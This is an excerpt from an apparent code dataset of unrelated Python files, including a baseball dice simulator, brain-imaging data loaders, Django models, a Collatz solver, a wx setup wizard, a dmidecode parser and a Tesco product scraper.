    GSB['Bat_Team_Status']['Bases'].insert(0,0)
    GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
    GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
    Batter_Up()
def Single():
    """Batter reaches first; every runner advances one base.

    The popped element is a runner pushed past 3rd, who scores.
    """
    GSB['Bat_Team_Status']['Bases'].insert(0,1)
    GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
    Batter_Up()
def BOE():
    """Batter on error: batter takes first, runners advance only if forced.

    NOTE(review): this body is identical to BOB() below; consider
    sharing one implementation.
    """
    # Runner on 1st with consecutive occupied bases -> everyone is forced
    # one base; with bases loaded the popped runner from 3rd scores.
    if GSB['Bat_Team_Status']['Bases'] in [[1,0,0],[1,1,0],[1,1,1]]:
        GSB['Bat_Team_Status']['Bases'].insert(0,1)
        GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
    # Runners on 1st and 3rd: only the runner on 1st is forced to 2nd.
    if GSB['Bat_Team_Status']['Bases'] == [1,0,1]:
        GSB['Bat_Team_Status']['Bases']= [1,1,1]
    # Otherwise 1st is open and the batter simply takes it.
    if GSB['Bat_Team_Status']['Bases'][0] == 0:
        GSB['Bat_Team_Status']['Bases'][0] = 1
    Batter_Up()
# In "base on balls" the batter goes to first. The other players advance to
# the next base, only if they have to (another player is coming for their base).
def BOB():
    """Base on balls (walk): batter takes first, runners advance only if forced."""
    # Runner on 1st with consecutive occupied bases -> everyone is forced
    # one base; with bases loaded the popped runner from 3rd scores.
    if GSB['Bat_Team_Status']['Bases'] in [[1,0,0],[1,1,0],[1,1,1]]:
        GSB['Bat_Team_Status']['Bases'].insert(0,1)
        GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
    # Runners on 1st and 3rd: only the runner on 1st is forced to 2nd.
    if GSB['Bat_Team_Status']['Bases'] == [1,0,1]:
        GSB['Bat_Team_Status']['Bases']= [1,1,1]
    # Otherwise 1st is open and the batter simply takes it.
    if GSB['Bat_Team_Status']['Bases'][0] == 0:
        GSB['Bat_Team_Status']['Bases'][0] = 1
    Batter_Up()
def Strike():
    """Record a strike; on the third strike the batter is out.

    NOTE(review): 'Balls' is tracked in Batter_Up but no pitch outcome
    ever increments it.
    """
    GSB['Bat_Team_Status']['Batter_Up']['Strikes'] += 1
    if GSB['Bat_Team_Status']['Batter_Up']['Strikes'] == 3: # 3 strikes, you're out!
        GSB['Bat_Team_Status']['Outs'] += 1
        Batter_Up()
# In foul out, no player on base advances.
def Foul_Out():
    """Batter fouls out; bases are unchanged."""
    GSB['Bat_Team_Status']['Outs'] += 1
    Batter_Up()
# Out at first presumes that the other players advance a base. It also presumes that
# the defense would out the man on third before outing the hitter, if only it could!
# If the bases are loaded, then the man at third gets to home.
# The base states of [0,1,0], [0,0,1],[0,1,1] remain unchanged.
def Out_at_First():
    """Batter grounds out at first; runners advance where the model allows."""
    GSB['Bat_Team_Status']['Outs'] += 1
    if GSB['Bat_Team_Status']['Outs'] < 3:
        # Runner on 1st (with consecutive bases) forces everyone forward.
        if GSB['Bat_Team_Status']['Bases'] in [[1,0,0],[1,1,0],[1,1,1]]:
            GSB['Bat_Team_Status']['Bases'].insert(0,0)
            # Man on 3rd can score, if bases loaded.
            GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
        if GSB['Bat_Team_Status']['Bases'] in [[1,0,1]]:
            GSB['Bat_Team_Status']['Bases'] = [0,1,1] # Man on 3rd dares not try!
    Batter_Up()
# In Fly_Out, each player on base advances, provided it is not the 3rd out.
def Fly_Out():
    """Batter flies out; every runner tags up and advances one base."""
    GSB['Bat_Team_Status']['Outs'] += 1
    if GSB['Bat_Team_Status']['Outs'] < 3:
        GSB['Bat_Team_Status']['Bases'].insert(0,0)
        # runner on 3rd base scores!
        GSB['Score'][GSB['Team_at_Bat']] += GSB['Bat_Team_Status']['Bases'].pop()
    Batter_Up()
def Double_Play():
    """Batter is out; one additional runner (the lead-most occurrence found
    by list.remove) is also put out if the inning is still live.

    NOTE(review): the final `MenOnBase -= 1` has no effect here (this is an
    `if`, not a loop) -- it looks copied from Triple_Play below.
    """
    GSB['Bat_Team_Status']['Outs'] += 1 # Assume batter is out
    MenOnBase = GSB['Bat_Team_Status']['Bases'].count(1) # Can out 1 more, if available!
    if GSB['Bat_Team_Status']['Outs'] < 3 and MenOnBase > 0:
        GSB['Bat_Team_Status']['Bases'].remove(1)
        GSB['Bat_Team_Status']['Bases'].insert(0,0)
        GSB['Bat_Team_Status']['Outs'] += 1
        MenOnBase -= 1
    Batter_Up()
def Triple_Play():
    """Batter is out; up to two more runners are put out while the
    inning is still live (remaining runners each shift back a base)."""
    GSB['Bat_Team_Status']['Outs'] += 1 # Assume batter is out
    MenOnBase = GSB['Bat_Team_Status']['Bases'].count(1) # Can only out 2 more, if available!
    while GSB['Bat_Team_Status']['Outs'] < 3 and MenOnBase > 0:
        GSB['Bat_Team_Status']['Bases'].remove(1)
        GSB['Bat_Team_Status']['Bases'].insert(0,0)
        GSB['Bat_Team_Status']['Outs'] += 1
        MenOnBase -= 1
    Batter_Up()
def Home_Run():
    """Batter and every runner on base score; the bases clear."""
    runs = 1 + sum(GSB['Bat_Team_Status']['Bases'])
    GSB['Score'][GSB['Team_at_Bat']] += runs
    GSB['Bat_Team_Status']['Bases'] = [0, 0, 0]  # Clear bases
    Batter_Up()
def Pitch():
    """Simulate one pitch: roll two dice and dispatch on the sorted pair.

    Every sorted (low, high) pair maps to exactly one outcome, so the
    dispatch table below is exhaustive.
    """
    first, second = randint(1, 6), randint(1, 6)
    roll = (min(first, second), max(first, second))
    outcomes = {
        (1, 1): Double,
        (1, 2): Single, (1, 3): Single, (1, 4): Single,
        (1, 5): BOE,
        (1, 6): BOB,
        (2, 2): Strike, (2, 3): Strike, (2, 4): Strike, (2, 5): Strike,
        (2, 6): Foul_Out,
        (3, 3): Out_at_First, (3, 4): Out_at_First,
        (3, 5): Out_at_First, (3, 6): Out_at_First,
        (4, 4): Fly_Out, (4, 5): Fly_Out, (4, 6): Fly_Out,
        (5, 5): Double_Play,
        (5, 6): Triple_Play,
        (6, 6): Home_Run,
    }
    outcomes[roll]()
def Game():
    """Play one full game; return (number of plays, final score dict)."""
    InitializeGSB()
    plays = 0
    while not Game_Over():
        plays += 1
        Pitch()
    return plays, GSB['Score']
def Stats(NumGames=100):
    """Simulate NumGames games; return parallel lists of plays and total runs."""
    plays_per_game = []
    runs_per_game = []
    for _ in range(NumGames):
        plays, score = Game()
        plays_per_game.append(plays)
        runs_per_game.append(score['HOME'] + score['VISITOR'])
    return plays_per_game, runs_per_game
def Run_Program():
    """Simulate many games, print summary statistics and plot histograms.

    Returns the per-game statistics as a pandas DataFrame with columns
    'Plays' and 'Runs'.
    """
    num_games = 1000
    Plays, Runs = Stats(num_games)
    SF = pd.DataFrame([Plays, Runs], index=['Plays', 'Runs'])
    SF = SF.T
    # BUG FIX: the f-string previously referenced an undefined name
    # `Games`, raising NameError before any output was printed.
    print(f'Stats for {num_games!r} games:')
    print(SF.describe().iloc[1:].round(2))
    SF.hist(column='Plays', grid=True, color='r', rwidth=0.9)
    SF.hist(column='Runs', grid=True, color='g', rwidth=0.9)
    return SF


if __name__ == '__main__':
    Run_Program()
|
15,756 | 903620a14c67e6a7474b2fc439542bb921c099c1 | import numpy as np
import pandas as pd
import nibabel as nib
import pkg_resources
data_path = pkg_resources.resource_filename('trackingtools', 'data/')
def read_csv(fn):
    '''
    Convenience function to read a csv file into a Pandas dataframe.
    Parameters
    __________
    fn : str
        Filename for the csv file
    Returns
    _______
    df : pd.DataFrame
        Pandas dataframe
    Example
    _______
    >> df = read_csv(fn='dmri_results.csv')
    '''
    # Thin pass-through wrapper kept for a stable local API.
    return pd.read_csv(fn)
def get_projection(ID, trimmed=False, both=False, data_only=True):
    """Load an Allen projection-density volume for experiment *ID*.

    Parameters
    ----------
    ID : experiment identifier interpolated into the data filename.
    trimmed : if True, also load the truth mask and zero out voxels
        outside it.
    both : (only with trimmed) return both the raw and the trimmed data.
    data_only : if False, also return the nibabel image object.

    Returns the requested array(s), optionally preceded by the image.
    """
    img = nib.load(
        data_path + f'allen/projection_densities/I{ID}_density.nii.gz')
    projection_density = img.get_data()
    if trimmed:
        timg = nib.load(data_path + f'allen/truth_masks/I{ID}_truth.nii.gz')
        mask = timg.get_data()
        # Keep only voxels inside the truth mask.
        trimmed_density = np.zeros_like(projection_density)
        trimmed_density[mask == 1] = projection_density[mask == 1]
        if both:
            if data_only:
                return projection_density, trimmed_density
            # BUG FIX: this tuple was previously built without `return`,
            # so the function silently returned None.
            return img, projection_density, trimmed_density
        if data_only:
            return trimmed_density
        # BUG FIX: same missing `return` as above.
        return img, trimmed_density
    if data_only:
        return projection_density
    return img, projection_density
def get_brain_mask():
    """Load and return the Allen whole-brain mask volume as an array.

    NOTE(review): nibabel's get_data() is deprecated in newer releases
    in favour of get_fdata() -- confirm the pinned nibabel version.
    """
    img = nib.load(data_path + 'allen/brain_mask.nii.gz')
    data = img.get_data()
    return data
|
15,757 | 38f3a17bb524068debe27e9c76d333b5879ae478 | from django.db import models
# Create your models here.
class EmailValidation(models.Model):
    """Stores an email address submitted for validation."""
    class Meta:
        pass
    email_pk = models.AutoField(primary_key=True)  # explicit surrogate key
    # user_name = models.CharField(max_length=50)
    request_email = models.CharField(max_length=50, null=False)  # address being validated
class NoteCertificateValidation(models.Model):
    """Validation request for a 'note'-type license certificate.

    NOTE(review): field meanings inferred from names ('lcs' presumably
    abbreviates license, 'dob' date of birth) -- confirm with the owning
    service before relying on them.
    """
    class Meta:
        pass
    lcs_kind = models.CharField(max_length=10, default='0')  # kind discriminator ('0' = note)
    hangul_name = models.CharField(max_length=50, null=False)  # holder name in Hangul
    dob = models.CharField(max_length=6)  # 6-digit date string (YYMMDD) -- TODO confirm
    lcs_num = models.CharField(max_length=12)
    issue_dob = models.CharField(max_length=8)  # 8-digit issue date (YYYYMMDD) -- TODO confirm
    lcs_mng_num = models.CharField(max_length=10)
class CertCertificateValidation(models.Model):
    """Validation request for a 'cert'-type license certificate.

    NOTE(review): field meanings inferred from names -- confirm upstream.
    """
    class Meta:
        pass
    lcs_kind = models.CharField(max_length=10, default='1')  # kind discriminator ('1' = cert)
    hangul_name = models.CharField(max_length=50, null=False)  # holder name in Hangul
    lcs_mng_num1 = models.CharField(max_length=8)
    lcs_mng_num2 = models.CharField(max_length=4)
def get_collatz_length(n):
    """Return the length of the shortcut Collatz chain from n down to 1.

    Each counted step may combine several textbook Collatz steps
    (odd 4k+1 numbers collapse three steps into one; even numbers
    divisible by 4 are halved twice), so lengths here are shorter than
    the plain 3n+1 chain length.

    Improvements over the original: counts steps instead of
    materializing the whole chain in a list, and uses floor division
    (//) so values stay integers under Python 3 as well.
    """
    steps = 0
    while n != 1:
        # handle odd elements in the sequence
        if n % 2:
            if n % 4 == 1:
                # 4k+1 -> 12k+4 -> 6k+2 -> 3k+1, collapsed into one step
                n = 3 * ((n - 1) // 4) + 1
            else:
                # if n is odd, 3n + 1 is always even, so fold in one halving
                n = (3 * n + 1) // 2
        # handle even elements in the sequence
        else:
            if n % 4:
                # ordinary halving for even numbers not divisible by 4
                n //= 2
            else:
                # divisible by 4: take two halvings at once
                n //= 4
        steps += 1
    return steps
def longest_collatz(upper_bound):
    """Return the n in [1, upper_bound] with the longest shortcut Collatz chain.

    BUG FIX: the original compared each new chain *length* against the
    stored winning *number* (`collatz_length > longest` where `longest`
    held x), so the maximum was tracked incorrectly.  Length and winner
    are now tracked separately.
    """
    assert type(upper_bound) == int and upper_bound > 0
    best_n = 1
    best_length = get_collatz_length(1)
    for x in range(2, upper_bound + 1):
        length = get_collatz_length(x)
        if length > best_length:
            best_length = length
            best_n = x
    return best_n
# Parenthesized call form is valid under both Python 2 and Python 3
# (the original `print expr` statement is a SyntaxError on Python 3).
print(longest_collatz(1000000))
|
15,759 | 0a7b3b6400065216159b0607d194618dff17ac4f | '''
Account wizard.
'''
import wx
from gui.pref import pg_accounts
from gui import skin
from gui.native.win.winutil import is_vista
import traceback
import util.primitives.funcs as utilfuncs
def show():
    """Raise an already-open account wizard, or create and display a new one."""
    if AccountWizard.RaiseExisting():
        return
    wizard = AccountWizard()
    wizard.CenterOnScreen()
    wizard.Show()
def bind_paint(ctrl, paint):
    """Attach *paint* to ctrl's EVT_PAINT, handing it a buffered device context."""
    def handler(event):
        return paint(wx.AutoBufferedPaintDC(ctrl))
    ctrl.Bind(wx.EVT_PAINT, handler)
class AccountWizard(wx.Frame):
    """First-run setup window hosting the accounts preference panel."""
    MIN_SIZE = (567, 569)  # fixed initial/minimum window size in pixels
    def __init__(self, parent=None):
        """Build the header banner and embed the accounts panel."""
        wx.Frame.__init__(self, parent, -1,
                          title=_('Digsby Setup Wizard'))
        self.SetFrameIcon(skin.get('AppDefaults.TaskbarIcon'))
        self.Bind(wx.EVT_CLOSE, self.on_close)
        big_panel = wx.Panel(self)
        # header
        header = wx.Panel(big_panel)
        header.SetBackgroundColour(wx.Colour(244, 249, 251))
        hdr1 = wx.StaticText(header, -1, _('Welcome to Digsby!'))
        set_font(hdr1, 18, True)
        # (emphasis flag, text) pairs for the tagline, rendered as a row
        # of StaticTexts so individual words can be bolded.
        elems = \
        [(False, 'All your '),
         (True, 'IM'),
         (False, ', '),
         (True, 'Email'),
         (False, ' and '),
         (True, 'Social Network'),
         (False, ' accounts under one roof.')]
        txts = []
        for emphasis, text in elems:
            txt = wx.StaticText(header, -1, text)
            set_font(txt, 12, bold=emphasis, underline=False)
            txts.append(txt)
        txt_sizer = wx.BoxSizer(wx.HORIZONTAL)
        txt_sizer.AddMany(txts)
        icon = skin.get('AppDefaults.TaskBarIcon').PIL.Resized(48).WXB
        # the app icon is painted directly onto the header panel
        bind_paint(header, lambda dc: dc.DrawBitmap(icon, 5, 3, True))
        icon_pad = icon.Width + 6
        header.Sizer = sz = wx.BoxSizer(wx.VERTICAL)
        sz.AddMany([(hdr1, 0, wx.EXPAND | wx.LEFT, 6 + icon_pad),
                    (3, 3),
                    (txt_sizer, 0, wx.EXPAND | wx.LEFT, 6 + icon_pad)])
        # accounts panel
        panel = wx.Panel(big_panel)
        panel.BackgroundColour = wx.WHITE
        panel.Sizer = sizer = wx.BoxSizer(wx.VERTICAL)
        # callbacks run when the wizard closes (see on_close)
        self.exithooks = utilfuncs.Delegate()
        pg_accounts.panel(panel, sizer, None, self.exithooks)
        # paint the background + line
        def paint(e):
            dc = wx.AutoBufferedPaintDC(big_panel)
            dc.Brush = wx.WHITE_BRUSH
            dc.Pen = wx.TRANSPARENT_PEN
            r = big_panel.ClientRect
            dc.DrawRectangleRect(r)
            dc.Brush = wx.Brush(header.BackgroundColour)
            y = header.Size.height + 19
            dc.DrawRectangle(0, 0, r.width, y)
            # one-pixel separator line under the header strip
            dc.Brush = wx.Brush(wx.BLACK)
            dc.DrawRectangle(0, y, r.width, 1)
        big_panel.BackgroundStyle = wx.BG_STYLE_CUSTOM
        big_panel.Bind(wx.EVT_PAINT, paint)
        # Done button
        # button_sizer = wx.BoxSizer(wx.HORIZONTAL)
        # button_sizer.AddStretchSpacer(1)
        # done = wx.Button(panel, -1, _('&Done'))
        # done.Bind(wx.EVT_BUTTON, lambda e: self.Close())
        # button_sizer.Add(done, 0, wx.EXPAND)
        # sizer.Add(button_sizer, 0, wx.EXPAND | wx.TOP, 10)
        big_panel.Sizer = sz = wx.BoxSizer(wx.VERTICAL)
        sz.Add(header, 0, wx.EXPAND | wx.ALL, 8)
        sz.Add((5, 5))
        sz.Add(panel, 1, wx.EXPAND | wx.ALL, 12)
        self.SetMinSize(self.MIN_SIZE)
        self.SetSize(self.MIN_SIZE)
    def on_close(self, e):
        """On close: schedule the tray-icon hint balloon, then run exit hooks."""
        def show_hint():
            icons = wx.GetApp().buddy_frame.buddyListPanel.tray_icons
            if icons:
                icon = icons[0][1]
                icon.ShowBalloon(_('Quick Access to Newsfeeds'),
                    _('\nYou can access social network and email newsfeeds'
                      ' by clicking their icons in the tray.\n'
                      '\nDouble click to update your status (social networks)'
                      ' or launch your inbox (email accounts).\n'
                      ' \n'), 0, wx.ICON_INFORMATION)
        wx.CallLater(300, show_hint)
        if getattr(self, 'exithooks', None) is not None:
            self.exithooks()
        e.Skip(True)
def set_font(ctrl, size, bold=False, underline=False):
    """Resize a control's font, optionally bolding/underlining it.

    On Vista the face is switched to Segoe UI to match the platform look.
    """
    font = ctrl.Font
    if is_vista():
        font.SetFaceName('Segoe UI')
    font.PointSize = size
    if bold:
        font.Weight = wx.FONTWEIGHT_BOLD
    if underline:
        font.SetUnderlined(True)
    ctrl.Font = font
|
15,760 | c2286351615e24986d4f90c2f068fee3515abee0 | from celery_tasks.main import celery_app
from celery_tasks.yuntongxun.ccp_sms import CCP
@celery_app.task(name='send_sms_verify_code')
def send_sms_verify_code(mobile, sms_code):
    '''Send an SMS verification code asynchronously through Celery.

    mobile   -- recipient phone number
    sms_code -- the verification code to embed in the template
    The template args are [code, 5] with template id 1 -- presumably
    "valid for 5 minutes"; confirm against the CCP template definition.
    '''
    result = CCP().send_template_sms(mobile, [sms_code, 5], 1)
    print(result)
    return result
15,761 | 26713acc718504ea87c5ff9adcfbfed45187e288 | """
Project Euler, problem 40
An irrational decimal fraction is created by concatenating the positive
integers: 0.12345678910'1'112131415161718192021...
It can be seen that the 12th digit of the fractional part is 1.
If dn represents the nth digit of the fractional part, find the value of
the following expression.
d1 × d10 × d100 × d1000 × d10000 × d100000 × d1000000
answer = 210 # correct
"""
# Walk the digits of 1, 2, 3, ... (Champernowne's fraction) and multiply
# together the digits landing at positions 1, 10, 100, ..., 10**6.
#
# `num` counts digits emitted so far; starting the loop at 0 emits one
# phantom digit up front, which makes `num + j` exactly the 1-indexed
# position of digit j of the current number.
#
# BUG FIX: the original tested `num == 10**power - j` with
# power = len(str(i)), which only matches a checkpoint falling inside a
# number with exactly that many digits; d1 and d10 were silently missed
# (the answer survived only because both digits happen to be 1).
targets = {10 ** k for k in range(7)}
num = 0
answer = 1
for i in range(1000001):
    digits = str(i)
    for j in range(len(digits)):
        if num + j in targets:
            answer *= int(digits[j])
    num += len(digits)
print("answer: ", answer)
|
15,762 | 5620b3815ceda98484270c2f7f1f30cc27ec9189 | from sysassert.datasource import DataSource
from sysassert.cmd import rawcmd
from sysassert.tools import normalize
class DMIDataSource(DataSource):
    """Data source backed by `dmidecode` output.

    Runs (or is handed) dmidecode text, parses every known handle
    section, and exposes the parsed records via get_items().
    """
    # SMBIOS/DMI structure type number -> human-readable type name.
    dmi_types = {
        0: 'bios',
        1: 'system',
        2: 'base board',
        3: 'chassis',
        4: 'processor',
        5: 'memory controller',
        6: 'memory module',
        7: 'cache',
        8: 'port connector',
        9: 'system slots',
        10: 'on board devices',
        11: 'oem strings',
        12: 'system configuration options',
        13: 'bios language',
        14: 'group associations',
        15: 'system event log',
        16: 'physical memory array',
        17: 'memory device',
        18: '32-bit memory error',
        19: 'memory array mapped address',
        20: 'memory device mapped address',
        21: 'built-in pointing device',
        22: 'portable battery',
        23: 'system reset',
        24: 'hardware security',
        25: 'system power controls',
        26: 'voltage probe',
        27: 'cooling device',
        28: 'temperature probe',
        29: 'electrical current probe',
        30: 'out-of-band remote access',
        31: 'boot integrity services',
        32: 'system boot',
        33: '64-bit memory error',
        34: 'management device',
        35: 'management device component',
        36: 'management device threshold data',
        37: 'memory channel',
        38: 'ipmi device',
        39: 'power supply',
        40: 'additional information',
        41: 'onboard device'
    }
    command = ['dmidecode']  # external command invoked when no data is supplied
    def __init__(self, dmidata=None):
        """Parse *dmidata* if given, else run dmidecode and parse its output.

        NOTE(review): self.dmidata is only assigned when dmidata is
        supplied; callers should rely on self.data instead.
        """
        if dmidata is not None:
            self.dmidata = dmidata
        else:
            dmidata = rawcmd(self.command)
        self.data = self._parse_dmi(dmidata)
    def dmi_id(self, dmi_type):
        """
        Finds a dmi id from the dmi type name
        Returns a dmi id or raises KeyError
        """
        if dmi_type not in self.dmi_types.values():
            # NOTE(review): assumes a gettext `_` is installed as a
            # builtin by the application -- confirm, else this raise
            # itself fails with NameError.
            raise KeyError(_('unknown dmi type'))
        return [item[0]
                for item in self.dmi_types.items()
                if item[1] == dmi_type][0]
    @classmethod
    def get_deps(cls):
        """Return the external binaries this data source depends on."""
        return [cls.command[0]]
    def get_items(self, dmi_type=None):
        """
        Returns dmi items matching an optional dmi id
        """
        if dmi_type is None:
            return [elt[1] for elt in self.data]
        dmi_id = self.dmi_id(dmi_type)
        return [elt[1] for elt in self.data if elt[0] == dmi_id]
    def _parse_dmi(self, content):
        """
        Parse the whole dmidecode output.
        Returns a list of tuples of (type int, value dict).
        """
        info = []
        lines = iter(content.strip().splitlines())
        while True:
            try:
                line = next(lines)
            except StopIteration:
                break
            if line.startswith('Handle 0x'):
                # handle line looks like: "Handle 0x..., DMI type N, M bytes"
                typ = int(line.split(',', 2)[1].strip()[len('DMI type'):])
                if typ in self.dmi_types:
                    info.append((typ, self._parse_handle_section(lines)))
        return info
    @staticmethod
    def _parse_handle_section(lines):
        """
        Parse a section of dmidecode output
        * 1st line contains address, type and size
        * 2nd line is title
        * line started with one tab is one option and its value
        * line started with two tabs is a member of list
        """
        data = {}
        key = ''
        next(lines)  # skip the section title line
        for line in lines:
            line = line.rstrip()
            if line.startswith('\t\t'):
                # continuation item belonging to the last list-valued key
                if isinstance(data[key], list):
                    data[key].append(line.lstrip())
            elif line.startswith('\t'):
                key, value = [i.strip() for i in line.lstrip().split(':', 1)]
                key = normalize(key)
                if value:
                    data[key] = value
                else:
                    # empty value means the following double-tab lines form a list
                    data[key] = []
            else:
                # blank/unindented line terminates the section
                break
        return data
|
15,763 | 6cc3bf52a0ee1608a7a04d65be9e0c2f379df4d7 | #!/Users/zhenghongwang/.pyenv/shims/python3
from typing import *
import os
import time
import urllib.request
import json
import hashlib
from fetch_audio import fetch_audio
raw_data_file_path = 'raw_data.json'  # manifest read, enriched, and rewritten below
mod_data = []  # holds the updated manifest before it is written back
# read audio file in local
audio_files = os.listdir('audio')  # NOTE(review): not referenced below -- candidates come from raw_data.json instead
def calc_md5(path):
    """Return the hex MD5 digest of the file at *path*, read in 8 KiB chunks."""
    digest = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(8192), b''):
            digest.update(chunk)
    return digest.hexdigest()
def fetch_audio_file(text, checker, li):
    """Download the TTS audio for *text* and record it in the manifest.

    text    -- phrase to synthesize; also used as the mp3 filename
    checker -- list of already-fetched texts; *text* is appended to it
    li      -- manifest audio list; a new entry dict is appended to it
    Side effects: writes audio/<text>.mp3 via fetch_audio and reads it
    back to compute its md5 and size.
    """
    fetch_audio(text)
    checker.append(text)
    audio_file_local_path = "audio/%s.mp3" % text
    new_entry = {
        "text": text,
        "path": audio_file_local_path,
        "md5": calc_md5(audio_file_local_path),
        "size": os.stat(audio_file_local_path).st_size,
        # public URL mirrors the local path on GitHub Pages
        "audio_url": "https://zh-wang.github.io/right_brain_training_data/%s" % audio_file_local_path
    }
    li.append(new_entry)
# Enrich the manifest in place: fill in missing md5/size/url fields for
# images and fetch any missing audio, then rewrite raw_data.json.
with open(raw_data_file_path, 'r') as json_file:
    data = json.load(json_file)
    # read audio files
    audio_already_exists = []
    for audio_entry in data['audio_data']:
        audio_already_exists.append(audio_entry['text'])
    # prepare image files
    for img_entry in data['img_data']:
        local_path = img_entry['local_path']
        # only compute fields that are missing/empty, so re-runs are cheap
        if not img_entry['md5']:
            img_entry['md5'] = calc_md5(local_path)
        if not img_entry['size']:
            img_entry['size'] = os.stat(local_path).st_size
        if not img_entry['img_url']:
            img_entry['img_url'] = "https://zh-wang.github.io/right_brain_training_data/%s" % local_path
        # prepare audio file for 'name_ja'
        if img_entry['name_ja'] not in audio_already_exists:
            fetch_audio_file(img_entry['name_ja'], audio_already_exists, data['audio_data'])
mod_data = data
# write the enriched manifest back out (non-ascii preserved for Japanese text)
with open(raw_data_file_path, 'w') as json_file:
    json_file.write(json.dumps(mod_data, ensure_ascii=False, indent=4))
|
15,764 | 660d61cc95271f4920c275663d04d9574d5472da | from itertools import zip_longest
import json
import scrapy
import logging
from items.items import ProductTescoItem
def array_test(i):
    """Join a list of strings with newlines; return None for an empty list.

    (Previously a lambda bound to a name -- PEP 8 E731; a def keeps the
    same callable name and behavior while giving it a real docstring.)
    """
    return None if len(i) == 0 else '\n'.join(i)
class TescoSpider(scrapy.Spider):
    """Scrapy spider for Tesco groceries category listings.

    Follows paginated category pages, visits every product tile, and
    yields one ProductTescoItem per product page.
    """
    name = 'tesco'
    allowed_domains = ['tesco.com']
    start_urls = ['https://www.tesco.com/groceries/en-GB/shop/household/kitchen-roll-and-tissues/all?page=1',
                  'https://www.tesco.com/groceries/en-GB/shop/pets/cat-food-and-accessories/all?page=1'
                  ]
    count = 0  # NOTE(review): never used in this class
    def product_data(self, response):
        """Scrape one product page into a ProductTescoItem and yield it."""
        item = ProductTescoItem()
        item['product_url'] = response.url
        # numeric product id is the last URL path segment
        item['product_id'] = int(response.url.split('/')[-1])
        item['image_url'] = response.xpath('//div[@class="product-image--clickable"]/div/img/@src').get()
        item['product_title'] = response.xpath('//h1[@class="product-details-tile__title"]/text()').get()
        # last breadcrumb link is the leaf category
        item['category'] = \
            response.xpath('//div/a/span[@class="styled__Text-sc-1xizymv-1 fGKZGz beans-link__text"]/text()').getall()[
                -1]
        item['price'] = float(response.xpath('//span[@data-auto="price-value"]/text()').getall()[0])
        # a part of description: concatenate the marketing/description/feature lists
        raw_product_description = response.xpath('//div[@id="product-marketing"]/ul/li/text()').getall() + \
                                  response.xpath('//div[@id="product-description"]/ul/li/text()').getall() + \
                                  response.xpath('//div[@id="features"]/ul/li/text()').getall() + \
                                  response.xpath('//div[@id="other-information"]/ul/li/text()').getall()
        item['product_description'] = array_test(raw_product_description)
        item['name_and_address'] = array_test(response.xpath('//div[@id="manufacturer-address"]/ul/li/text()').getall())
        item['return_address'] = array_test(response.xpath('//div[@id="return-address"]/ul/li/text()').getall())
        item['net_contents'] = array_test(
            response.xpath('//div[@id="net-contents"]/p/text()|//div[@id="pack-size"]/ul/li/text()').getall())
        # a part of review: zip the per-field lists into dicts, serialized as JSON
        review = []
        review_list_keys = ['review_title', 'stars_count', 'author', 'date', 'review_text']
        review_title = response.xpath('//div[@id="review-data"]/article/section/h4/text()').getall()
        stars_count = [int(i.split(' ')[0]) for i in
                       response.xpath('//div[@id="review-data"]/article/section/div/span/text()').getall()]
        raw_author = response.xpath(
            '//section[@class="styled__StyledReview-sxgbrl-0 gMpPCJ"]/p[1]/span[1]/text()').getall()
        date = response.xpath('//span[@class="submission-time"]/text()').getall()
        # anonymous reviews surface the date where the author would be; blank those out
        author = [raw_author[i] if raw_author[i] != date[i] else None for i in range(len(raw_author))]
        review_text = response.xpath(
            '//section[@class="styled__StyledReview-sxgbrl-0 gMpPCJ"]/p[2]/text()|//section[@class="styled__StyledReview-sxgbrl-0 gMpPCJ"]/p[3]/text()').getall()
        if len(review_text) == 0:
            item['review'] = None
        else:
            for i in zip_longest(review_title, stars_count, author, date, review_text):
                review.append(dict(zip((review_list_keys), i)))
            item['review'] = json.dumps(review)
        # a part of usually bought products
        usually_bought_product_url = response.xpath('//div[@class="product-tile-wrapper"]/div/div/div/a/@href').getall()
        usually_bought_product_title = response.xpath(
            '//div[@class="product-tile-wrapper"]/div/div/div/div/div/h3/a/text()').getall()
        if len(usually_bought_product_url) == 0 or len(usually_bought_product_title) == 0:
            item['usually_bought_next_products'] = None
        else:
            usually_bought_next_products = []
            usually_bought_products_keys = ['product_url', 'product_title']
            for i in zip_longest(usually_bought_product_url, usually_bought_product_title):
                usually_bought_next_products.append(dict(zip((usually_bought_products_keys), i)))
            item['usually_bought_next_products'] = json.dumps(usually_bought_next_products)
        logger = logging.getLogger()
        logger.info('Parse function called on %s', response.url)
        yield item
    def parse(self, response):
        """Follow every product tile on a listing page, then the next page."""
        NEXT_PAGE_SELECTOR = "//*[@name='go-to-results-page']/@href"
        PRODUCT_ON_PAGE_SELECTOR = "//*[@data-auto='product-tile--title']/@href"
        next_page = response.xpath(NEXT_PAGE_SELECTOR).get()
        product_list_on_page = response.xpath(PRODUCT_ON_PAGE_SELECTOR).getall()
        for product_link in product_list_on_page:
            yield scrapy.Request(response.urljoin(product_link), callback=self.product_data)
        if next_page:
            yield scrapy.Request(response.urljoin(next_page), callback=self.parse)
|
15,765 | a946a585646de69ecd604e0e044b1d830b543b1f | from utils.Timer import *
from StateMachine import *
from datetime import datetime, timedelta
from Stimulus import *
import os
class State(StateClass):
    """Base experiment state: shared setup, logging, and timing helpers.

    Concrete states copy this instance's attributes via the parent
    mechanism in __init__ and share the module-level `states` dict.
    """
    def __init__(self, parent=None):
        self.timer = Timer()
        # Child states inherit the parent's attribute set (logger, beh,
        # stim, params, ...) by shallow-copying its __dict__.
        if parent:
            self.__dict__.update(parent.__dict__)
    def setup(self, logger, BehaviorClass, StimulusClass, session_params, conditions):
        """Create behavior/stimulus objects, the state machine, and the state table."""
        logger.log_session(session_params, 'Free')
        # Initialize params & Behavior/Stimulus objects
        self.logger = logger
        self.beh = BehaviorClass(logger, session_params)
        self.stim = StimulusClass(logger, session_params, conditions, self.beh)
        self.params = session_params
        exitState = Exit(self)
        self.StateMachine = StateMachine(Prepare(self), exitState)
        self.logger.log_conditions(conditions, ['RewardCond'])
        self.logger.lock = False
        # Initialize states
        global states
        states = {
            'PreTrial'     : PreTrial(self),
            'Trial'        : Trial(self),
